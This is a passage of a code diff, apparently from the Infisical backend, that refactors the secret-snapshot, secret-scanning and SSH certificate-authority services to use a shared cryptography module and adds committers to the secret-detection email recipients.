+          const isCompleted = payload.status === SecretScanningScanStatus.Completed;
+          // We assume that the committer is one of the project members
+          const isCommitter = isCompleted && payload.authorEmail === member.user.email;
+          return isAdmin || isCommitter;
+        });
 
         const timestamp = new Date().toISOString();
 
         await smtpService.sendMail({
-          recipients: projectAdmins.map((member) => member.user.email!).filter(Boolean),
+          recipients: recipients.map((member) => member.user.email!).filter(Boolean),
           template:
             payload.status === SecretScanningScanStatus.Completed
               ? SmtpTemplates.SecretScanningV2SecretsDetected

backend/src/ee/services/secret-scanning/secret-scanning-service.ts

@@ -1,5 +1,3 @@
-import crypto from "node:crypto";
-
 import { ForbiddenError } from "@casl/ability";
 import { WebhookEventMap } from "@octokit/webhooks-types";
 import { ProbotOctokit } from "probot";
@@ -7,6 +5,7 @@ import { ProbotOctokit } from "probot";
 import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { NotFoundError } from "@app/lib/errors";
 
 import { TGitAppDALFactory } from "./git-app-dal";

backend/src/ee/services/secret-snapshot/secret-snapshot-service.ts

@@ -3,7 +3,7 @@
 import { ForbiddenError } from "@casl/ability";
 
 import { TableName, TSecretTagJunctionInsert, TSecretV2TagJunctionInsert } from "@app/db/schemas";
-import { decryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { InternalServerError, NotFoundError } from "@app/lib/errors";
 import { groupBy } from "@app/lib/fn";
 import { logger } from "@app/lib/logger";
@@ -233,14 +233,16 @@ export const secretSnapshotServiceFactory = ({
       const { botKey } = await projectBotService.getBotKey(snapshot.projectId);
       if (!botKey)
         throw new NotFoundError({ message: `Project bot key not found for project with ID '${snapshot.projectId}'` });
+
       snapshotDetails = {
         ...encryptedSnapshotDetails,
         secretVersions: encryptedSnapshotDetails.secretVersions.map((el) => {
-          const secretKey = decryptSymmetric128BitHexKeyUTF8({
+          const secretKey = crypto.encryption().symmetric().decrypt({
             ciphertext: el.secretKeyCiphertext,
             iv: el.secretKeyIV,
             tag: el.secretKeyTag,
-            key: botKey
+            key: botKey,
+            keySize: SymmetricKeySize.Bits128
           });
 
           const canReadValue = hasSecretReadValueOrDescribePermission(
@@ -257,11 +259,12 @@ export const secretSnapshotServiceFactory = ({
           let secretValue = "";
 
           if (canReadValue) {
-            secretValue = decryptSymmetric128BitHexKeyUTF8({
+            secretValue = crypto.encryption().symmetric().decrypt({
               ciphertext: el.secretValueCiphertext,
               iv: el.secretValueIV,
               tag: el.secretValueTag,
-              key: botKey
+              key: botKey,
+              keySize: SymmetricKeySize.Bits128
             });
           } else {
             secretValue = INFISICAL_SECRET_VALUE_HIDDEN_MASK;
@@ -274,11 +277,12 @@ export const secretSnapshotServiceFactory = ({
             secretValue,
             secretComment:
               el.secretCommentTag && el.secretCommentIV && el.secretCommentCiphertext
-                ? decryptSymmetric128BitHexKeyUTF8({
+                ? crypto.encryption().symmetric().decrypt({
                     ciphertext: el.secretCommentCiphertext,
                     iv: el.secretCommentIV,
                     tag: el.secretCommentTag,
-                    key: botKey
+                    key: botKey,
+                    keySize: SymmetricKeySize.Bits128
                   })
                 : ""
           };

backend/src/ee/services/ssh/ssh-certificate-authority-fns.ts

@@ -1,5 +1,4 @@
 import { execFile } from "child_process";
-import crypto from "crypto";
 import { promises as fs } from "fs";
 import { Knex } from "knex";
 import os from "os";
@@ -9,6 +8,7 @@ import { promisify } from "util";
 
 import { TSshCertificateTemplates } from "@app/db/schemas";
 import { SshCertKeyAlgorithm } from "@app/ee/services/ssh-certificate/ssh-certificate-types";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { ms } from "@app/lib/ms";
 import { CharacterType, characterValidator } from "@app/lib/validator/validate-string";